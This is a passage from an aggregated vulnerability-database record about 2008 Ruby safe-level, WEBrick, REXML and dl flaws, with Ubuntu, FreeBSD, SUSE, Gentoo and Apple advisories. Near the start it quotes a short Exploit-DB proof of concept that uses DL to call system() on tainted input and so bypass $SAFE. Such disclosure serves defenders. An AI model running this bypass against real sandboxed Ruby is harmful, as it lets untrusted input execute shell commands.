'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n \r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n \r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n \r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\nrequire 'dl'\r\n$SAFE = 1\r\nh = DL.dlopen(nil)\r\nsys = h.sym('system', 'IP')\r\nuname = 'uname -rs'.taint\r\nsys[uname]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32223/"}], "ubuntu": [{"lastseen": "2019-05-29T17:23:17", "bulletinFamily": "unix", "description": "Laurent Gaffie discovered that Ruby did not properly check for memory allocation failures. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously applied to fix CVE-2008-3790. The regression would cause parsing of some XML documents to fail.", "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "USN-691-1", "href": "https://usn.ubuntu.com/691-1/", "title": "Ruby vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:12", "bulletinFamily": "unix", "description": "Akira Tagoh discovered a vulnerability in Ruby which lead to an integer overflow. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2376)\n\nLaurent Gaffie discovered that Ruby did not properly check for memory allocation failures. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service. (CVE-2008-3443)\n\nKeita Yamaguchi discovered several safe level vulnerabilities in Ruby. An attacker could use this to bypass intended access restrictions. (CVE-2008-3655)\n\nKeita Yamaguchi discovered that WEBrick in Ruby did not properly validate paths ending with \u201c.\u201d. A remote attacker could send a crafted HTTP request and cause a denial of service. (CVE-2008-3656)\n\nKeita Yamaguchi discovered that the dl module in Ruby did not check the taintness of inputs. An attacker could exploit this vulnerability to bypass safe levels and execute dangerous functions. (CVE-2008-3657)\n\nLuka Treiber and Mitja Kolsek discovered that REXML in Ruby did not always use expansion limits when processing XML documents. If a user or automated system were tricked into open a crafted XML file, an attacker could cause a denial of service via CPU consumption. (CVE-2008-3790)\n\nJan Lieskovsky discovered several flaws in the name resolver of Ruby. A remote attacker could exploit this to spoof DNS entries, which could lead to misdirected traffic. This is a different vulnerability from CVE-2008-1447. (CVE-2008-3905)", "modified": "2008-10-10T00:00:00", "published": "2008-10-10T00:00:00", "id": "USN-651-1", "href": "https://usn.ubuntu.com/651-1/", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "\nThe official ruby site reports:\n\nSeveral vulnerabilities in safe level have been discovereds:.\n\nuntrace_var is permitted at safe level 4;\n$PROGRAM_NAME may be modified at safe level 4;\ninsecure methods may be called at safe level 1-3;\nsyslog operations are permitted at safe level 4;\ndl doesn't check taintness, so it could allow attackers\n\t to call dangerous functions.\n\n\n", "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "C329712A-6B5B-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/c329712a-6b5b-11dd-9d79-001fc61c2a55.html", "title": "ruby -- multiple vulnerabilities in safe level", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "\nThe official ruby site reports:\n\nWEBrick::HTTP::DefaultFileHandler is faulty of exponential time\n\t taking requests due to a backtracking regular expression in\n\t WEBrick::HTTPUtils.split_header_value.\n\n", "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/f7ba20aa-6b5a-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DoS vulnerability in WEBrick", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:52:34", "bulletinFamily": "unix", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending an overlong subnet field (CVE-2009-0692). In theory a malicious DHCP server could exploit the flaw to execute arbitrary code as root on machines using dhclient to obtain network settings. Newer distributions (SLES10+, openSUSE) do have buffer overflow checking that guards against this kind of stack overflow though. So actual exploitability is rather unlikely.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-07-15T16:27:03", "published": "2009-07-15T16:27:03", "id": "SUSE-SA:2009:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00003.html", "type": "suse", "title": "remote code execution in dhcp-client", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\"WEBRick\") and a class for XML parsing (\"REXML\"). \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Ruby interpreter and its standard libraries. Drew Yao of Apple Product Security discovered the following flaws: \n\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_str_buf_append() function (CVE-2008-2662).\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_ary_stor() function (CVE-2008-2663).\n * Memory corruption via alloca in the rb_str_format() function (CVE-2008-2664).\n * Memory corruption (\"REALLOC_N\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2725).\n * Memory corruption (\"beg + rlen\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2726).\n\nFurthermore, several other vulnerabilities have been reported: \n\n * Tanaka Akira reported an issue with resolv.rb that enables attackers to spoof DNS responses (CVE-2008-1447).\n * Akira Tagoh of RedHat discovered a Denial of Service (crash) issue in the rb_ary_fill() function in array.c (CVE-2008-2376).\n * Several safe level bypass vulnerabilities were discovered and reported by Keita Yamaguchi (CVE-2008-3655).\n * Christian Neukirchen is credited for discovering a Denial of Service (CPU consumption) attack in the WEBRick HTTP server (CVE-2008-3656).\n * A fault in the dl module allowed the circumvention of taintness checks which could possibly lead to insecure code execution was reported by \"sheepman\" (CVE-2008-3657).\n * Tanaka Akira again found a DNS spoofing vulnerability caused by the resolv.rb implementation using poor randomness (CVE-2008-3905).\n * Luka Treiber and Mitja Kolsek (ACROS Security) disclosed a Denial of Service (CPU consumption) vulnerability in the REXML module when dealing with recursive entity expansion (CVE-2008-3790).\n\n### Impact\n\nThese vulnerabilities allow remote attackers to execute arbitrary code, spoof DNS responses, bypass Ruby's built-in security and taintness checks, and cause a Denial of Service via crash or CPU exhaustion. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Ruby users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-1.8.6_p287-r1\"", "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "GLSA-200812-17", "href": "https://security.gentoo.org/glsa/200812-17", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "About the security content of Security Update 2009-002 / Mac OS X v10.5.7\r\n\r\n * Last Modified: May 12, 2009\r\n * Article: HT3549\r\n\r\nSummary\r\n\r\nThis document describes the security content of Security Update 2009-002 / Mac OS X v10.5.7, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nProduct Security, Mac OS X 10.5\r\nSecurity Update 2009-002 / Mac OS X v10.5.7\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-2939\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11\r\n\r\n Impact: Visiting a malicious website via a proxy may result in cross-site scripting\r\n\r\n Description: An input validation issue exists in Apache's handling of FTP proxy requests containing wildcard characters. Visiting a malicious website via an Apache proxy may result in a cross-site scripting attack. This update addresses the issue by applying the Apache patch for version 2.0.63. Further information is available via the Apache web site at http://httpd.apache.org/ Apache 2.0.x is only shipped with Mac OS X Server v10.4.x systems. Mac OS X v10.5.x and Mac OS X Server v10.5.x ship with Apache 2.2.x.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-2939\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a malicious website via a proxy may result in cross-site scripting\r\n\r\n Description: An input validation issue exists in Apache 2.2.9's handling of FTP proxy requests containing wildcard characters. Visiting a malicious website via an Apache proxy may result in a cross-site scripting attack. This update addresses the issue by updating Apache to version 2.2.11. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-0456\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Web sites that allow users to control the name of a served file may be vulnerable to HTTP response injection\r\n\r\n Description: A request forgery issue exists in Apache. Apache does not escape filenames when negotiating the correct content type to send to a remote browser. A user who can publish files with specially crafted names to a web site can substitute their own response for any web page hosted on the system. This update addresses the issue by escaping filenames in content negotiation responses.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2009-0154\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Charlie Miller of Independent Security Evaluators working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n BIND\r\n\r\n CVE-ID: CVE-2009-0025\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: BIND is susceptible to a spoofing attack if configured to use DNSSEC\r\n\r\n Description: BIND incorrectly checks the return value of the OpenSSL DSA_do_verify function. On systems using the DNS Security Extensions (DNSSEC) protocol, a maliciously crafted DSA certificate could bypass the validation, which may lead to a spoofing attack. By default, DNSSEC is not enabled. This update addresses the issue by updating BIND to version 9.3.6-P1 on Mac OS X v10.4, and version 9.4.3-P1 for Mac OS X v10.5 systems. Further information is available via the ISC web site at https://www.isc.org/\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2009-0144\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Applications that use CFNetwork may send secure cookies in unencrypted HTTP requests\r\n\r\n Description: An implementation issue exists in CFNetwork's parsing of Set-Cookie headers, which may result in certain cookies being unexpectedly sent over a non-encrypted connection. This issue affects non-RFC compliant Set-Cookie headers that are accepted for compatibility reasons. This may result in applications that use CFNetwork, such as Safari, sending sensitive information in unencrypted HTTP requests. This update addresses the issue through improved parsing of Set-Cookie headers. This issue does not affect systems prior to Mac OS X v10.5. Credit to Andrew Mortensen of the University of Michigan for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2009-0157\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of overly long HTTP headers in CFNetwork. Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of HTTP headers. This issue does not affect systems prior to Mac OS X v10.5. Credit to Moritz Jodeit of n.runs AG for reporting this issue.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0145\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds and error checking.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0155\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer underflow in CoreGraphics' handling of PDF files may result in a heap buffer overflow. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to Barry K. Nathan for reporting this issue.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0146, CVE-2009-0147, CVE-2009-0165\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Viewing or downloading a PDF file containing a maliciously crafted JBIG2 stream may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple heap buffer overflows exist in CoreGraphics' handling of PDF files containing JBIG2 streams. Viewing or downloading a PDF file containing a maliciously crafted JBIG2 stream may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Apple, Alin Rad Pop of Secunia Research, and Will Dormann of CERT/CC for reporting this issue.\r\n\r\n *\r\n\r\n Cscope\r\n\r\n CVE-ID: CVE-2009-0148\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted source file with Cscope may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Cscope's handling of long file system path names. Using Cscope to process a maliciously crafted source file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2009-0164\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted web site may lead to unauthorized access of the Web Interface of CUPS\r\n\r\n Description: Under certain circumstances, the Web Interface of CUPS 1.3.9 and earlier may be accessible to attackers through DNS rebinding attacks. In the default configuration, this may allow a maliciously crafted website to start and stop printers, and access information about printers and jobs. This update addresses the issue by performing additional validation of the Host header. Credit: Apple.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2009-0150\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the handling of disk images. Mounting a maliciously crafted sparse disk image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to Tiller Beauchamp of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2009-0149\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in the handling of disk images. Mounting a maliciously crafted sparse disk image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n enscript\r\n\r\n CVE-ID: CVE-2004-1184, CVE-2004-1185, CVE-2004-1186, CVE-2008-3863\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in enscript\r\n\r\n Description: enscript is updated to version 1.6.4 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the gnu web site at http://www.gnu.org/software/enscript/\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2009-0519, CVE-2009-0520, CVE-2009-0114\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution when viewing a maliciously crafted web site. The issues are addressed by updating the Flash Player plug-in on Mac OS v10.5.x systems to version 10.0.22.87, and to version 9.0.159.0 on Mac OS X v10.4.11 systems. Further information is available via the Adobe web site at http://www.adobe.com/support/security/bulletins/apsb09-01.html\r\n\r\n *\r\n\r\n Help Viewer\r\n\r\n CVE-ID: CVE-2009-0942\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "help:" URL may lead to arbitrary code execution\r\n\r\n Description: Help Viewer loads Cascading Style Sheets referenced in URL parameters without validating that the referenced style sheets are located within a registered help book. A malicious "help:" URL may be used to invoke arbitrary AppleScript files, which may lead to arbitrary code execution. This update addresses the issue through improved validation of file system paths when loading stylesheets. Credit to Brian Mastenbrook for reporting this issue.\r\n\r\n *\r\n\r\n Help Viewer\r\n\r\n CVE-ID: CVE-2009-0943\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "help:" URL may lead to arbitrary code execution\r\n\r\n Description: Help Viewer does not validate that full paths to HTML documents are within registered help books. A malicious "help:" URL may be used to invoke arbitrary AppleScript files, which may lead to arbitrary code execution. This update addresses the issue through improved validation of "help:" URLs. Credit to Brian Mastenbrook for reporting this issue.\r\n\r\n *\r\n\r\n iChat\r\n\r\n CVE-ID: CVE-2009-0152\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: iChat AIM communications configured for SSL may downgrade to plaintext\r\n\r\n Description: iChat supports Secure Sockets Layer (SSL) for AOL Instant Messenger and Jabber accounts. iChat automatically disables SSL for AOL Instant Messenger accounts when it is unable to connect, and sends subsequent communications in plain text until SSL is manually re-enabled. A remote attacker with the ability to observe network traffic from an affected system may obtain the contents of AOL Instant Messenger conversations. This update addresses the issue by changing the behavior of iChat to always attempt to use SSL, and to use less secure channels only if the "Require SSL" preference is not enabled. This issue does not affect systems prior to Mac OS X v10.5, as they do not support SSL for iChat accounts.\r\n\r\n *\r\n\r\n International Components for Unicode\r\n\r\n CVE-ID: CVE-2009-0153\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting\r\n\r\n Description: An implementation issue exists in ICU's handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.\r\n\r\n *\r\n\r\n IPSec\r\n\r\n CVE-ID: CVE-2008-3651, CVE-2008-3652\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in the racoon daemon may lead to a denial of service\r\n\r\n Description: Multiple memory leaks exist in the racoon daemon in ipsec-tools before 0.7.1, which may lead to a denial of service. This update addresses the issues through improved memory management.\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0845\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted authentication packet may lead to a denial of service of a Kerberos-enabled program\r\n\r\n Description: A null pointer dereference issue exists in the Kerberos SPNEGO support. Processing a maliciously crafted authentication packet may lead to a denial of service of a Kerberos-enabled program. This update addresses the issue by adding a check for a null pointer. This issue does not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0846, CVE-2009-0847\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted ASN.1 encoded message may lead to a denial of service of a Kerberos-enabled program or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in Kerberos' handling of ASN.1 encoded messages. Processing a maliciously crafted ASN.1 encoded message may lead to a denial of service of a Kerberos-enabled program or arbitrary code execution. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0844\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted Kerberos data packet may lead to a denial of service of a Kerberos-enabled program\r\n\r\n Description: An out-of-bounds memory access exists in Kerberos. Processing a maliciously crafted Kerberos data packet may lead to a denial of service of a Kerberos-enabled program. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2008-1517\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A local user may obtain system privileges\r\n\r\n Description: An unchecked index issue exists in the kernel's handling of workqueues, which may lead to an unexpected system shutdown or arbitrary code execution with Kernel privileges. This update addresses the issue through improved index checking. Credit to an anonymous researcher working with Verisign iDefense VCP for reporting this issue.\r\n\r\n *\r\n\r\n Launch Services\r\n\r\n CVE-ID: CVE-2009-0156\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Downloading a maliciously crafted Mach-O executable may cause Finder to repeatedly terminate and relaunch\r\n\r\n Description: An out-of-bounds memory read access exists in Launch Services. Downloading a maliciously crafted Mach-O executable may cause the Finder to repeatedly terminate and relaunch. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n libxml\r\n\r\n CVE-ID: CVE-2008-3529\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in libxml's handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n Net-SNMP\r\n\r\n CVE-ID: CVE-2008-4309\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A remote attacker may terminate the operation of the SNMP service\r\n\r\n Description: An integer overflow exists in the netsnmp_create_subtree_cache function. By sending a maliciously crafted SNMPv3 packet, an attacker may cause the SNMP server to terminate, denying service to legitimate clients. This update addresses the issue by applying the Net-SNMP patches on Mac OS X v10.4.11 systems, and by updating net_snmp to version 5.4.2.1 on Mac OS X v10.5.x systems. The SNMP service is not enabled by default on Mac OS X or Mac OS X Server.\r\n\r\n *\r\n\r\n Network Time\r\n\r\n CVE-ID: CVE-2009-0021\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Network Time is susceptible to a spoofing attack if NTP authentication is enabled\r\n\r\n Description: The ntpd daemon incorrectly checks the return value of the OpenSSL EVP_VerifyFinal function. On systems using NTPv4 authentication, this may allow a maliciously crafted signature to bypass the cryptographic signature validation, which may lead to a time spoofing attack. By default, NTP authentication is not enabled. This update addresses the issue by properly checking the return value of the EVP_VerifyFinal function.\r\n\r\n *\r\n\r\n Network Time\r\n\r\n CVE-ID: CVE-2009-0159\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Using the ntpq command to request peer information from a malicious remote time server may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the ntpq program. When the ntpq program is used to request peer information from a remote time server, a maliciously crafted response may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2008-3530\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A remote user may be able to cause an unexpected system shutdown\r\n\r\n Description: When IPv6 support is enabled, IPv6 nodes use ICMPv6 to report errors encountered while processing packets. An implementation issue in the handling of incoming ICMPv6 "Packet Too Big" messages may cause an unexpected system shutdown. This update addresses the issue through improved handling of ICMPv6 messages.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2008-5077\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A man-in-the-middle attacker may be able to impersonate a trusted server or user in applications using OpenSSL for SSL certificate verification\r\n\r\n Description: Several functions within the OpenSSL library incorrectly check the result value of the EVP_VerifyFinal function. A man-in-the-middle attacker may be able to impersonate a trusted server or user in applications using OpenSSL for SSL certificate verification for DSA and ECDSA keys. This update addresses the issue by properly checking the return value of the EVP_VerifyFinal function.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2008-3659, CVE-2008-2829, CVE-2008-3660, CVE-2008-2666, CVE-2008-2371, CVE-2008-2665, CVE-2008-3658, CVE-2008-5557\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.6\r\n\r\n Description: PHP is updated to version 5.2.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n QuickDraw Manager\r\n\r\n CVE-ID: CVE-2009-0160\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickDraw's handling of PICT images. Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of PICT images. Credit: Apple.\r\n * QuickDraw Manager\r\n\r\n CVE-ID: CVE-2009-0010\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer underflow in the handling of PICT images may result in a heap buffer overflow. Opening a maliciously crafted PICT file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of PICT images. Credit to Damian Put and Sebastian Apelt working with TippingPoint's Zero Day Initiative, and Chris Ries of Carnegie Mellon University Computing Services for reporting this issue.\r\n\r\n *\r\n\r\n ruby\r\n\r\n CVE-ID: CVE-2008-3443, CVE-2008-3655, CVE-2008-3656, CVE-2008-3657, CVE-2008-3790\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through 